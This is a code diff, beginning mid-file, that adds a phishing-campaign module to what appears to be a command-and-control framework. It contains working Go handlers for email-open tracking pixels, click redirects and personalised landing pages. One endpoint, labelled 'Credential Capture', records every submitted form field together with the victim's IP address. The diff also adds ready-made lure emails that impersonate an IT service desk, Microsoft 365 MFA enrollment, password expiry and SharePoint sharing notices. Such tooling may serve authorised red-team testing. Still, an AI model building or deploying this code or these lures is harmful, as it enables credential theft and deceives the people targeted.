+	data, err := s.ts.TsExtenderDataLoad(ExtenderName, "campaign:"+id)
+	if err != nil {
+		return c, err
+	}
+	err = json.Unmarshal(data, &c)
+	return c, err
+}
+
+func (s *PhishingService) DeleteCampaign(id string) error {
+	_ = s.ts.TsExtenderDataDelete(ExtenderName, "campaign:"+id)
+	_ = s.ts.TsExtenderDataDelete(ExtenderName, "targets:"+id)
+	_ = s.ts.TsExtenderDataDelete(ExtenderName, "results:"+id)
+	return nil
+}
+
+func (s *PhishingService) ListCampaigns() []Campaign {
+	var campaigns []Campaign
+	keys, err := s.ts.TsExtenderDataKeys(ExtenderName)
+	if err != nil {
+		return campaigns
+	}
+
+	for _, key := range keys {
+		if strings.HasPrefix(key, "campaign:") {
+			data, err := s.ts.TsExtenderDataLoad(ExtenderName, key)
+			if err != nil {
+				continue
+			}
+			var c Campaign
+			if json.Unmarshal(data, &c) == nil {
+				campaigns = append(campaigns, c)
+			}
+		}
+	}
+	return campaigns
+}
+
+// ============================================================================
+// Target CRUD
+// ============================================================================
+
+func (s *PhishingService) SaveTargets(campaignID string, targets []Target) error {
+	data, err := json.Marshal(targets)
+	if err != nil {
+		return err
+	}
+	return s.ts.TsExtenderDataSave(ExtenderName, "targets:"+campaignID, data)
+}
+
+func (s *PhishingService) LoadTargets(campaignID string) []Target {
+	var targets []Target
+	data, err := s.ts.TsExtenderDataLoad(ExtenderName, "targets:"+campaignID)
+	if err != nil {
+		return targets
+	}
+	json.Unmarshal(data, &targets)
+	return targets
+}
+
+// ============================================================================
+// Result CRUD
+// ============================================================================
+
+func (s *PhishingService) SaveResults(campaignID string, results []Result) error {
+	data, err := json.Marshal(results)
+	if err != nil {
+		return err
+	}
+	return s.ts.TsExtenderDataSave(ExtenderName, "results:"+campaignID, data)
+}
+
+func (s *PhishingService) LoadResults(campaignID string) []Result {
+	var results []Result
+	data, err := s.ts.TsExtenderDataLoad(ExtenderName, "results:"+campaignID)
+	if err != nil {
+		return results
+	}
+	json.Unmarshal(data, &results)
+	return results
+}
+
+// LoadResultByTrackingID searches all campaign results for a specific tracking ID.
+func (s *PhishingService) LoadResultByTrackingID(trackingID string) (*Result, string) {
+	keys, err := s.ts.TsExtenderDataKeys(ExtenderName)
+	if err != nil {
+		return nil, ""
+	}
+
+	for _, key := range keys {
+		if !strings.HasPrefix(key, "results:") {
+			continue
+		}
+		campaignID := strings.TrimPrefix(key, "results:")
+		results := s.LoadResults(campaignID)
+		for i := range results {
+			if results[i].ID == trackingID {
+				return &results[i], campaignID
+			}
+		}
+	}
+	return nil, ""
+}
+
+// UpdateResult updates a specific result within its campaign's results.
+func (s *PhishingService) UpdateResult(campaignID string, result *Result) error {
+	results := s.LoadResults(campaignID)
+	for i := range results {
+		if results[i].ID == result.ID {
+			results[i] = *result
+			return s.SaveResults(campaignID, results)
+		}
+	}
+	return fmt.Errorf("result not found")
+}
+
+// ============================================================================
+// Campaign Stats
+// ============================================================================
+
+type CampaignStats struct {
+	TotalTargets int `json:"total_targets"`
+	Sent         int `json:"sent"`
+	Opened       int `json:"opened"`
+	Clicked      int `json:"clicked"`
+	Submitted    int `json:"submitted"`
+	Errors       int `json:"errors"`
+}
+
+func (s *PhishingService) GetCampaignStats(campaignID string) CampaignStats {
+	results := s.LoadResults(campaignID)
+	targets := s.LoadTargets(campaignID)
+	stats := CampaignStats{
+		TotalTargets: len(targets),
+	}
+	for _, r := range results {
+		switch r.Status {
+		case "error":
+			stats.Errors++
+		case "submitted":
+			stats.Submitted++
+			stats.Clicked++
+			stats.Opened++
+			stats.Sent++
+		case "clicked":
+			stats.Clicked++
+			stats.Opened++
+			stats.Sent++
+		case "opened":
+			stats.Opened++
+			stats.Sent++
+		case "sent":
+			stats.Sent++
+		}
+	}
+	return stats
+}
+
+// ============================================================================
+// Helpers
+// ============================================================================
+
+func nowUnix() int64 {
+	return time.Now().Unix()
+}

--- a/AdaptixServer/extenders/phishing_service/pl_main.go
+++ b/AdaptixServer/extenders/phishing_service/pl_main.go
@@ -1,0 +1,151 @@
+package main
+
+import (
+	"encoding/json"
+	"net/http"
+	"sync"
+
+	adaptix "github.com/Adaptix-Framework/axc2"
+)
+
+type Teamserver interface {
+	TsExtenderDataSave(extenderName string, key string, value []byte) error
+	TsExtenderDataLoad(extenderName string, key string) ([]byte, error)
+	TsExtenderDataDelete(extenderName string, key string) error
+	TsExtenderDataKeys(extenderName string) ([]string, error)
+
+	TsEndpointRegisterPublicRaw(method string, path string, handler func(w http.ResponseWriter, r *http.Request)) error
+	TsEndpointUnregisterPublic(method string, path string) error
+	TsEndpointExistsPublic(method string, path string) bool
+
+	TsServiceSendDataAll(service string, data string)
+	TsServiceSendDataClient(operator string, service string, data string)
+}
+
+const ServiceName = "Phishing"
+const ExtenderName = "phishing_service"
+
+type PhishingService struct {
+	ts        Teamserver
+	moduleDir string
+	mu        sync.RWMutex
+	stopChans map[string]chan struct{} // campaignID -> stop channel
+}
+
+var (
+	Ts        Teamserver
+	ModuleDir string
+	Service   *PhishingService
+)
+
+func InitPlugin(ts any, moduleDir string, serviceConfig string) adaptix.PluginService {
+	Ts = ts.(Teamserver)
+	ModuleDir = moduleDir
+
+	Service = &PhishingService{
+		ts:        Ts,
+		moduleDir: moduleDir,
+		stopChans: make(map[string]chan struct{}),
+	}
+
+	Service.RegisterEndpoints()
+
+	return Service
+}
+
+func (s *PhishingService) Call(operator string, function string, args string) {
+	switch function {
+
+	case "campaign_create":
+		s.HandleCampaignCreate(operator, args)
+
+	case "campaign_list":
+		s.HandleCampaignList(operator)
+
+	case "campaign_delete":
+		s.HandleCampaignDelete(operator, args)
+
+	case "campaign_start":
+		s.HandleCampaignStart(operator, args)
+
+	case "campaign_stop":
+		s.HandleCampaignStop(operator, args)
+
+	case "targets_import":
+		s.HandleTargetsImport(operator, args)
+
+	case "targets_list":
+		s.HandleTargetsList(operator, args)
+
+	case "targets_delete":
+		s.HandleTargetsDelete(operator, args)
+
+	case "results_list":
+		s.HandleResultsList(operator, args)
+
+	case "results_export":
+		s.HandleResultsExport(operator, args)
+
+	case "templates_list":
+		s.HandleTemplatesList(operator)
+
+	case "landers_list":
+		s.HandleLandersList(operator)
+
+	case "template_preview":
+		s.HandleTemplatePreview(operator, args)
+	}
+}
+
+// sendResponse sends a JSON response back to all connected clients via the service data channel.
+func (s *PhishingService) sendResponseAll(msgType string, data interface{}) {
+	resp := map[string]interface{}{
+		"type": msgType,
+		"data": data,
+	}
+	jsonData, err := json.Marshal(resp)
+	if err != nil {
+		return
+	}
+	s.ts.TsServiceSendDataAll(ServiceName, string(jsonData))
+}
+
+// sendResponseClient sends a JSON response to a specific operator.
+func (s *PhishingService) sendResponseClient(operator string, msgType string, data interface{}) {
+	resp := map[string]interface{}{
+		"type": msgType,
+		"data": data,
+	}
+	jsonData, err := json.Marshal(resp)
+	if err != nil {
+		return
+	}
+	s.ts.TsServiceSendDataClient(operator, ServiceName, string(jsonData))
+}
+
+// sendEvent sends a real-time event notification to all clients.
+func (s *PhishingService) sendEvent(eventType string, data interface{}) {
+	resp := map[string]interface{}{
+		"type":  "event",
+		"event": eventType,
+		"data":  data,
+	}
+	jsonData, err := json.Marshal(resp)
+	if err != nil {
+		return
+	}
+	s.ts.TsServiceSendDataAll(ServiceName, string(jsonData))
+}
+
+// sendError sends an error message to a specific operator.
+func (s *PhishingService) sendError(operator string, message string) {
+	resp := map[string]interface{}{
+		"type":    "error",
+		"message": message,
+	}
+	jsonData, err := json.Marshal(resp)
+	if err != nil {
+		return
+	}
+	s.ts.TsServiceSendDataClient(operator, ServiceName, string(jsonData))
+}

--- a/AdaptixServer/extenders/phishing_service/pl_tracker.go
+++ b/AdaptixServer/extenders/phishing_service/pl_tracker.go
@@ -1,0 +1,253 @@
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"strings"
+)
+
+// 1x1 transparent GIF
+var transparentGIF = []byte{
+	0x47, 0x49, 0x46, 0x38, 0x39, 0x61, 0x01, 0x00, 0x01, 0x00,
+	0x80, 0x00, 0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x21,
+	0xf9, 0x04, 0x01, 0x00, 0x00, 0x00, 0x00, 0x2c, 0x00, 0x00,
+	0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x02, 0x02, 0x44,
+	0x01, 0x00, 0x3b,
+}
+
+// RegisterEndpoints registers the public tracking endpoints.
+func (s *PhishingService) RegisterEndpoints() {
+	s.ts.TsEndpointRegisterPublicRaw("GET", "/px/:id", s.HandleTrackingPixel)
+	s.ts.TsEndpointRegisterPublicRaw("GET", "/cl/:id", s.HandleClick)
+	s.ts.TsEndpointRegisterPublicRaw("GET", "/lp/:id", s.HandleLander)
+	s.ts.TsEndpointRegisterPublicRaw("POST", "/sb/:id", s.HandleSubmit)
+}
+
+// extractPathID extracts the last segment of the URL path.
+// For /px/abc123.png it returns "abc123" (stripping .png extension)
+// For /cl/abc123 it returns "abc123"
+func extractPathID(r *http.Request) string {
+	path := r.URL.Path
+	parts := strings.Split(path, "/")
+	if len(parts) == 0 {
+		return ""
+	}
+	last := parts[len(parts)-1]
+	// Strip .png extension for tracking pixel
+	last = strings.TrimSuffix(last, ".png")
+	return last
+}
+
+func getRemoteIP(r *http.Request) string {
+	if xff := r.Header.Get("X-Forwarded-For"); xff != "" {
+		parts := strings.Split(xff, ",")
+		return strings.TrimSpace(parts[0])
+	}
+	if xri := r.Header.Get("X-Real-IP"); xri != "" {
+		return xri
+	}
+	return strings.Split(r.RemoteAddr, ":")[0]
+}
+
+// ============================================================================
+// GET /px/:id — Tracking Pixel
+// ============================================================================
+
+func (s *PhishingService) HandleTrackingPixel(w http.ResponseWriter, r *http.Request) {
+	trackingID := extractPathID(r)
+	if trackingID == "" {
+		w.Header().Set("Content-Type", "image/gif")
+		w.Write(transparentGIF)
+		return
+	}
+
+	s.mu.Lock()
+	result, campaignID := s.LoadResultByTrackingID(trackingID)
+	if result != nil && result.OpenedAt == 0 {
+		result.Status = statusMax(result.Status, "opened")
+		result.OpenedAt = nowUnix()
+		result.UserAgent = r.UserAgent()
+		result.RemoteIP = getRemoteIP(r)
+		s.UpdateResult(campaignID, result)
+
+		go s.sendEvent("opened", map[string]interface{}{
+			"campaign_id": campaignID,
+			"result":      result,
+		})
+	}
+	s.mu.Unlock()
+
+	w.Header().Set("Content-Type", "image/gif")
+	w.Header().Set("Cache-Control", "no-store, no-cache, must-revalidate, max-age=0")
+	w.Header().Set("Pragma", "no-cache")
+	w.Write(transparentGIF)
+}
+
+// ============================================================================
+// GET /cl/:id — Click Tracker
+// ============================================================================
+
+func (s *PhishingService) HandleClick(w http.ResponseWriter, r *http.Request) {
+	trackingID := extractPathID(r)
+	if trackingID == "" {
+		http.Error(w, "Not Found", http.StatusNotFound)
+		return
+	}
+
+	s.mu.Lock()
+	result, campaignID := s.LoadResultByTrackingID(trackingID)
+	if result != nil && result.ClickedAt == 0 {
+		result.Status = statusMax(result.Status, "clicked")
+		result.ClickedAt = nowUnix()
+		result.UserAgent = r.UserAgent()
+		result.RemoteIP = getRemoteIP(r)
+		s.UpdateResult(campaignID, result)
+
+		go s.sendEvent("clicked", map[string]interface{}{
+			"campaign_id": campaignID,
+			"result":      result,
+		})
+	}
+	s.mu.Unlock()
+
+	// Redirect to landing page
+	landerURL := fmt.Sprintf("/lp/%s", trackingID)
+	http.Redirect(w, r, landerURL, http.StatusFound)
+}
+
+// ============================================================================
+// GET /lp/:id — Landing Page
+// ============================================================================
+
+func (s *PhishingService) HandleLander(w http.ResponseWriter, r *http.Request) {
+	trackingID := extractPathID(r)
+	if trackingID == "" {
+		http.Error(w, "Not Found", http.StatusNotFound)
+		return
+	}
+
+	s.mu.RLock()
+	result, campaignID := s.LoadResultByTrackingID(trackingID)
+	s.mu.RUnlock()
+
+	if result == nil {
+		http.Error(w, "Not Found", http.StatusNotFound)
+		return
+	}
+
+	campaign, err := s.LoadCampaign(campaignID)
+	if err != nil {
+		http.Error(w, "Not Found", http.StatusNotFound)
+		return
+	}
+
+	landerContent := s.loadLander(campaign.Lander)
+	if landerContent == "" {
+		http.Error(w, "Not Found", http.StatusNotFound)
+		return
+	}
+
+	submitURL := fmt.Sprintf("/sb/%s", trackingID)
+	replacer := strings.NewReplacer(
+		"{{.FirstName}}", result.FirstName,
+		"{{.LastName}}", result.LastName,
+		"{{.Email}}", result.Email,
+		"{{.Company}}", findTargetCompany(s, result.CampaignID, result.TargetID),
+		"{{.Position}}", findTargetPosition(s, result.CampaignID, result.TargetID),
+		"{{.TrackingID}}", trackingID,
+		"{{.SubmitURL}}", submitURL,
+		"{{.Subject}}", campaign.Subject,
+	)
+	html := replacer.Replace(landerContent)
+
+	w.Header().Set("Content-Type", "text/html; charset=utf-8")
+	w.Header().Set("Cache-Control", "no-store, no-cache, must-revalidate, max-age=0")
+	w.Write([]byte(html))
+}
+
+// ============================================================================
+// POST /sb/:id — Credential Capture
+// ============================================================================
+
+func (s *PhishingService) HandleSubmit(w http.ResponseWriter, r *http.Request) {
+	trackingID := extractPathID(r)
+	if trackingID == "" {
+		http.Error(w, "Not Found", http.StatusNotFound)
+		return
+	}
+
+	r.ParseForm()
+	formData := make(map[string]string)
+	for key, values := range r.PostForm {
+		if len(values) > 0 {
+			formData[key] = values[0]
+		}
+	}
+
+	submitJSON, _ := json.Marshal(formData)
+
+	s.mu.Lock()
+	result, campaignID := s.LoadResultByTrackingID(trackingID)
+	if result != nil {
+		result.Status = "submitted"
+		result.SubmitAt = nowUnix()
+		result.SubmitData = string(submitJSON)
+		result.UserAgent = r.UserAgent()
+		result.RemoteIP = getRemoteIP(r)
+		s.UpdateResult(campaignID, result)
+
+		go s.sendEvent("submitted", map[string]interface{}{
+			"campaign_id": campaignID,
+			"result":      result,
+		})
+	}
+	s.mu.Unlock()
+
+	redirectURL := "https://login.microsoftonline.com"
+	if campaignID != "" {
+		if campaign, err := s.LoadCampaign(campaignID); err == nil && campaign.RedirectURL != "" {
+			redirectURL = campaign.RedirectURL
+		}
+	}
+
+	http.Redirect(w, r, redirectURL, http.StatusFound)
+}
+
+// ============================================================================
+// Helpers
+// ============================================================================
+
+// statusMax returns the "higher" status in the progression chain.
+func statusMax(current string, candidate string) string {
+	order := map[string]int{
+		"sent":      1,
+		"opened":    2,
+		"clicked":   3,
+		"submitted": 4,
+	}
+	if order[candidate] > order[current] {
+		return candidate
+	}
+	return current
+}
+
+func findTargetCompany(s *PhishingService, campaignID string, targetID string) string {
+	targets := s.LoadTargets(campaignID)
+	for _, t := range targets {
+		if t.ID == targetID {
+			return t.Company
+		}
+	}
+	return ""
+}
+
+func findTargetPosition(s *PhishingService, campaignID string, targetID string) string {
+	targets := s.LoadTargets(campaignID)
+	for _, t := range targets {
+		if t.ID == targetID {
+			return t.Position
+		}
+	}
+	return ""
+}

--- a/AdaptixServer/extenders/phishing_service/templates/default_email.html
+++ b/AdaptixServer/extenders/phishing_service/templates/default_email.html
@@ -1,0 +1,54 @@
+<!DOCTYPE html>
+<html>
+<head>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+</head>
+<body style="margin:0;padding:0;font-family:Arial,Helvetica,sans-serif;font-size:14px;color:#333333;background-color:#f5f5f5;">
+<table width="100%" cellpadding="0" cellspacing="0" style="background-color:#f5f5f5;padding:20px 0;">
+<tr>
+<td align="center">
+<table width="600" cellpadding="0" cellspacing="0" style="background-color:#ffffff;border-radius:4px;overflow:hidden;">
+
+<!-- Header -->
+<tr>
+<td style="background-color:#0078d4;padding:30px 40px;">
+<h1 style="margin:0;color:#ffffff;font-size:22px;font-weight:normal;">Document Shared With You</h1>
+</td>
+</tr>
+
+<!-- Body -->
+<tr>
+<td style="padding:40px;">
+<p style="margin:0 0 20px 0;">Dear {{.FirstName}},</p>
+
+<p style="margin:0 0 20px 0;">A document has been shared with you that requires your review. Please click the link below to access it securely.</p>
+
+<table cellpadding="0" cellspacing="0" style="margin:30px 0;">
+<tr>
+<td style="background-color:#0078d4;border-radius:4px;padding:12px 30px;">
+<a href="{{.ClickURL}}" style="color:#ffffff;text-decoration:none;font-size:16px;font-weight:bold;">View Document</a>
+</td>
+</tr>
+</table>
+
+<p style="margin:0 0 10px 0;color:#666666;font-size:12px;">If the button doesn't work, copy and paste this link into your browser:</p>
+<p style="margin:0 0 20px 0;color:#666666;font-size:12px;word-break:break-all;">{{.ClickURL}}</p>
+
+<p style="margin:0;color:#999999;font-size:11px;">This link will expire in 24 hours.</p>
+</td>
+</tr>
+
+<!-- Footer -->
+<tr>
+<td style="background-color:#f8f8f8;padding:20px 40px;border-top:1px solid #e0e0e0;">
+<p style="margin:0;color:#999999;font-size:11px;">This is an automated notification. Please do not reply to this email.</p>
+</td>
+</tr>
+
+</table>
+</td>
+</tr>
+</table>
+</body>
+</html>

--- a/AdaptixServer/extenders/phishing_service/templates/helpdesk_ticket.html
+++ b/AdaptixServer/extenders/phishing_service/templates/helpdesk_ticket.html
@@ -1,0 +1,62 @@
+<!DOCTYPE html>
+<html>
+<head>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+</head>
+<body style="margin:0;padding:0;font-family:'Segoe UI',Tahoma,Geneva,Verdana,sans-serif;font-size:14px;color:#333;background-color:#f4f4f4;">
+<table width="100%" cellpadding="0" cellspacing="0" style="background-color:#f4f4f4;padding:30px 0;">
+<tr><td align="center">
+<table width="600" cellpadding="0" cellspacing="0" style="background:#fff;border-radius:6px;overflow:hidden;box-shadow:0 1px 3px rgba(0,0,0,0.1);">
+
+<!-- Header -->
+<tr><td style="background-color:#2c3e50;padding:24px 40px;">
+<table width="100%"><tr>
+<td><span style="color:#fff;font-size:20px;font-weight:600;">IT Service Desk</span></td>
+<td align="right"><span style="background:#e74c3c;color:#fff;font-size:11px;padding:3px 10px;border-radius:10px;font-weight:600;">HIGH PRIORITY</span></td>
+</tr></table>
+</td></tr>
+
+<!-- Body -->
+<tr><td style="padding:32px 40px;">
+<p style="margin:0 0 20px;">Hello {{.FirstName}},</p>
+
+<p style="margin:0 0 20px;">A support ticket has been opened on your behalf due to unusual activity detected on your account. Please review the details below and take action to secure your account.</p>
+
+<!-- Ticket Card -->
+<table width="100%" cellpadding="0" cellspacing="0" style="border:1px solid #dee2e6;border-radius:6px;overflow:hidden;margin:0 0 24px;">
+<tr><td style="background:#f8f9fa;padding:12px 20px;border-bottom:1px solid #dee2e6;">
+<span style="font-weight:600;color:#2c3e50;">Ticket #INC-2024-78432</span>
+</td></tr>
+<tr><td style="padding:20px;">
+<table width="100%" cellspacing="0" cellpadding="6">
+<tr><td style="color:#666;width:120px;font-size:13px;">Status:</td><td style="font-size:13px;"><span style="color:#e67e22;font-weight:600;">&#9679; Awaiting User Action</span></td></tr>
+<tr><td style="color:#666;font-size:13px;">Priority:</td><td style="font-size:13px;"><span style="color:#e74c3c;font-weight:600;">High</span></td></tr>
+<tr><td style="color:#666;font-size:13px;">Category:</td><td style="font-size:13px;">Account Security</td></tr>
+<tr><td style="color:#666;font-size:13px;">Affected User:</td><td style="font-size:13px;">{{.Email}}</td></tr>
+<tr><td style="color:#666;font-size:13px;">Description:</td><td style="font-size:13px;">Multiple failed login attempts detected from an unrecognized location. Password verification required.</td></tr>
+</table>
+</td></tr>
+</table>
+
+<table cellpadding="0" cellspacing="0" style="margin:0 0 24px;">
+<tr><td style="background-color:#2c3e50;border-radius:4px;padding:12px 32px;">
+<a href="{{.ClickURL}}" style="color:#fff;text-decoration:none;font-size:15px;font-weight:600;">Verify Identity &amp; Secure Account</a>
+</td></tr>
+</table>
+
+<p style="margin:0 0 8px;color:#888;font-size:12px;">If you recognize this activity, you can safely close this ticket after verification.</p>
+<p style="margin:0;color:#888;font-size:12px;">If you do not recognize this activity, please verify your identity immediately and change your password.</p>
+</td></tr>
+
+<!-- Footer -->
+<tr><td style="background-color:#f8f9fa;padding:20px 40px;border-top:1px solid #e9ecef;">
+<p style="margin:0 0 4px;color:#6c757d;font-size:11px;">{{.Company}} IT Service Desk &bull; Automated Notification</p>
+<p style="margin:0;color:#6c757d;font-size:11px;">Hours: Mon-Fri 8:00 AM - 6:00 PM &bull; ext. 4357 (HELP)</p>
+</td></tr>
+
+</table>
+</td></tr>
+</table>
+</body>
+</html>

--- a/AdaptixServer/extenders/phishing_service/templates/mfa_setup.html
+++ b/AdaptixServer/extenders/phishing_service/templates/mfa_setup.html
@@ -1,0 +1,65 @@
+<!DOCTYPE html>
+<html>
+<head>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+</head>
+<body style="margin:0;padding:0;font-family:'Segoe UI',Tahoma,Geneva,Verdana,sans-serif;font-size:14px;color:#333;background-color:#f4f4f4;">
+<table width="100%" cellpadding="0" cellspacing="0" style="background-color:#f4f4f4;padding:30px 0;">
+<tr><td align="center">
+<table width="600" cellpadding="0" cellspacing="0" style="background:#fff;border-radius:6px;overflow:hidden;box-shadow:0 1px 3px rgba(0,0,0,0.1);">
+
+<!-- Header -->
+<tr><td style="background-color:#107c10;padding:24px 40px;">
+<table width="100%"><tr>
+<td><span style="color:#fff;font-size:20px;font-weight:600;">Microsoft 365 Security</span></td>
+<td align="right"><span style="color:rgba(255,255,255,0.7);font-size:12px;">Security Update</span></td>
+</tr></table>
+</td></tr>
+
+<!-- Body -->
+<tr><td style="padding:32px 40px;">
+<p style="margin:0 0 20px;font-size:16px;font-weight:600;color:#107c10;">&#128274; Multi-Factor Authentication Enrollment Required</p>
+
+<p style="margin:0 0 16px;">Dear {{.FirstName}},</p>
+
+<p style="margin:0 0 16px;">As part of our ongoing commitment to security, {{.Company}} is requiring all employees to enroll in Multi-Factor Authentication (MFA) by the end of this week.</p>
+
+<p style="margin:0 0 8px;font-weight:600;">To complete enrollment:</p>
+<table cellpadding="0" cellspacing="0" style="margin:0 0 24px;">
+<tr><td style="padding:8px 0;vertical-align:top;width:30px;color:#107c10;font-weight:bold;">1.</td>
+<td style="padding:8px 0;">Sign in to verify your identity</td></tr>
+<tr><td style="padding:8px 0;vertical-align:top;width:30px;color:#107c10;font-weight:bold;">2.</td>
+<td style="padding:8px 0;">Follow the guided setup wizard</td></tr>
+<tr><td style="padding:8px 0;vertical-align:top;width:30px;color:#107c10;font-weight:bold;">3.</td>
+<td style="padding:8px 0;">Choose your preferred authentication method</td></tr>
+</table>
+
+<table cellpadding="0" cellspacing="0" style="margin:0 0 24px;">
+<tr><td style="background-color:#107c10;border-radius:4px;padding:12px 32px;">
+<a href="{{.ClickURL}}" style="color:#fff;text-decoration:none;font-size:15px;font-weight:600;">Start MFA Enrollment</a>
+</td></tr>
+</table>
+
+<!-- Info Box -->
+<table width="100%" cellpadding="0" cellspacing="0" style="background:#f0f6f0;border:1px solid #c3e6cb;border-radius:4px;margin:0 0 16px;">
+<tr><td style="padding:16px;">
+<p style="margin:0 0 4px;font-weight:600;font-size:13px;color:#155724;">Why is this important?</p>
+<p style="margin:0;font-size:13px;color:#155724;">MFA adds an extra layer of protection to your account. Even if your password is compromised, unauthorized access is prevented without your second factor.</p>
+</td></tr>
+</table>
+
+<p style="margin:0;color:#888;font-size:12px;">Employees who do not complete enrollment by the deadline may experience limited access to company resources.</p>
+</td></tr>
+
+<!-- Footer -->
+<tr><td style="background-color:#f8f9fa;padding:20px 40px;border-top:1px solid #e9ecef;">
+<p style="margin:0 0 4px;color:#6c757d;font-size:11px;">{{.Company}} IT Department &bull; Microsoft 365 Administration</p>
+<p style="margin:0;color:#6c757d;font-size:11px;">This email was sent to {{.Email}}. Do not reply to this email.</p>
+</td></tr>
+
+</table>
+</td></tr>
+</table>
+</body>
+</html>

--- a/AdaptixServer/extenders/phishing_service/templates/password_expiry.html
+++ b/AdaptixServer/extenders/phishing_service/templates/password_expiry.html
@@ -1,0 +1,61 @@
+<!DOCTYPE html>
+<html>
+<head>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+</head>
+<body style="margin:0;padding:0;font-family:'Segoe UI',Tahoma,Geneva,Verdana,sans-serif;font-size:14px;color:#333;background-color:#f4f4f4;">
+<table width="100%" cellpadding="0" cellspacing="0" style="background-color:#f4f4f4;padding:30px 0;">
+<tr><td align="center">
+<table width="600" cellpadding="0" cellspacing="0" style="background:#fff;border-radius:6px;overflow:hidden;box-shadow:0 1px 3px rgba(0,0,0,0.1);">
+
+<!-- Header -->
+<tr><td style="background-color:#0078d4;padding:24px 40px;">
+<table width="100%"><tr>
+<td><span style="color:#fff;font-size:20px;font-weight:600;">IT Security</span></td>
+<td align="right"><span style="color:rgba(255,255,255,0.7);font-size:12px;">Action Required</span></td>
+</tr></table>
+</td></tr>
+
+<!-- Alert Banner -->
+<tr><td style="background-color:#fff4ce;padding:14px 40px;border-bottom:1px solid #ffe58f;">
+<table><tr>
+<td style="padding-right:10px;vertical-align:top;font-size:18px;">&#9888;</td>
+<td style="font-size:13px;color:#856404;"><strong>Password Expiration Notice</strong> &mdash; Your password will expire in <strong>24 hours</strong>.</td>
+</tr></table>
+</td></tr>
+
+<!-- Body -->
+<tr><td style="padding:32px 40px;">
+<p style="margin:0 0 16px;">Hello {{.FirstName}},</p>
+
+<p style="margin:0 0 16px;">Our records indicate that your account password for <strong>{{.Email}}</strong> is scheduled to expire within the next 24 hours. To avoid any disruption to your access, please update your password immediately.</p>
+
+<p style="margin:0 0 8px;font-weight:600;">What happens if you don't act:</p>
+<ul style="margin:0 0 24px;padding-left:20px;color:#555;">
+<li style="margin-bottom:6px;">You will be locked out of email, VPN, and internal systems</li>
+<li style="margin-bottom:6px;">Active sessions will be terminated</li>
+<li style="margin-bottom:6px;">You will need to contact IT support to regain access</li>
+</ul>
+
+<table cellpadding="0" cellspacing="0" style="margin:24px 0;">
+<tr><td style="background-color:#0078d4;border-radius:4px;padding:12px 32px;">
+<a href="{{.ClickURL}}" style="color:#fff;text-decoration:none;font-size:15px;font-weight:600;">Update Password Now</a>
+</td></tr>
+</table>
+
+<p style="margin:0 0 8px;color:#888;font-size:12px;">This link will expire in 24 hours for security purposes.</p>
+<p style="margin:0;color:#888;font-size:12px;">If you did not request this change, please contact IT support immediately.</p>
+</td></tr>
+
+<!-- Footer -->
+<tr><td style="background-color:#f8f9fa;padding:20px 40px;border-top:1px solid #e9ecef;">
+<p style="margin:0 0 4px;color:#6c757d;font-size:11px;">This is an automated message from {{.Company}} IT Security.</p>
+<p style="margin:0;color:#6c757d;font-size:11px;">Please do not reply to this email. Ref: SEC-{{.TrackingID}}</p>
+</td></tr>
+
+</table>
+</td></tr>
+</table>
+</body>
+</html>

--- a/AdaptixServer/extenders/phishing_service/templates/shared_document.html
+++ b/AdaptixServer/extenders/phishing_service/templates/shared_document.html
@@ -1,0 +1,64 @@
+<!DOCTYPE html>
+<html>
+<head>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+</head>
+<body style="margin:0;padding:0;font-family:'Segoe UI',Tahoma,Geneva,Verdana,sans-serif;font-size:14px;color:#333;background-color:#f4f4f4;">
+<table width="100%" cellpadding="0" cellspacing="0" style="background-color:#f4f4f4;padding:30px 0;">
+<tr><td align="center">
+<table width="600" cellpadding="0" cellspacing="0" style="background:#fff;border-radius:6px;overflow:hidden;box-shadow:0 1px 3px rgba(0,0,0,0.1);">
+
+<!-- Header -->
+<tr><td style="padding:28px 40px;border-bottom:1px solid #eee;">
+<table width="100%"><tr>
+<td>
+<span style="display:inline-block;width:36px;height:36px;background:#0078d4;border-radius:4px;text-align:center;line-height:36px;color:#fff;font-weight:bold;font-size:16px;vertical-align:middle;margin-right:10px;">S</span>
+<span style="font-size:18px;font-weight:600;color:#333;vertical-align:middle;">SharePoint</span>
+</td>
+<td align="right"><span style="color:#999;font-size:12px;">Online</span></td>
+</tr></table>
+</td></tr>
+
+<!-- Body -->
+<tr><td style="padding:36px 40px;">
+<p style="margin:0 0 8px;color:#0078d4;font-size:13px;font-weight:600;text-transform:uppercase;letter-spacing:0.5px;">Document Shared</p>
+
+<p style="margin:0 0 20px;font-size:16px;"><strong>{{.SenderName}}</strong> shared a file with you</p>
+
+<!-- File Preview Box -->
+<table width="100%" cellpadding="0" cellspacing="0" style="border:1px solid #e1e5e8;border-radius:6px;overflow:hidden;margin:0 0 24px;">
+<tr><td style="background:#f8f9fa;padding:20px;">
+<table width="100%"><tr>
+<td style="width:48px;vertical-align:top;">
+<div style="width:40px;height:48px;background:#185abd;border-radius:3px;text-align:center;line-height:48px;color:#fff;font-weight:bold;font-size:12px;">W</div>
+</td>
+<td style="vertical-align:top;padding-left:12px;">
+<p style="margin:0 0 4px;font-weight:600;font-size:14px;">Q3 Financial Report - Confidential.docx</p>
+<p style="margin:0;color:#666;font-size:12px;">Modified {{.SenderName}} &bull; 245 KB</p>
+</td>
+</tr></table>
+</td></tr>
+</table>
+
+<p style="margin:0 0 24px;color:#555;">{{.FirstName}}, please review this document at your earliest convenience and provide your feedback.</p>
+
+<table cellpadding="0" cellspacing="0" style="margin:0 0 24px;">
+<tr><td style="background-color:#0078d4;border-radius:4px;padding:11px 28px;">
+<a href="{{.ClickURL}}" style="color:#fff;text-decoration:none;font-size:14px;font-weight:600;">Open Document</a>
+</td></tr>
+</table>
+
+<p style="margin:0;color:#999;font-size:12px;">You can also access this document from your SharePoint Online portal.</p>
+</td></tr>
+
+<!-- Footer -->
+<tr><td style="background-color:#f8f9fa;padding:16px 40px;border-top:1px solid #e9ecef;">
+<p style="margin:0;color:#999;font-size:11px;">Microsoft SharePoint &bull; You're receiving this because {{.Email}} has access to this document.</p>
+</td></tr>
+
+</table>
+</td></tr>
+</table>
+</body>
+</html>

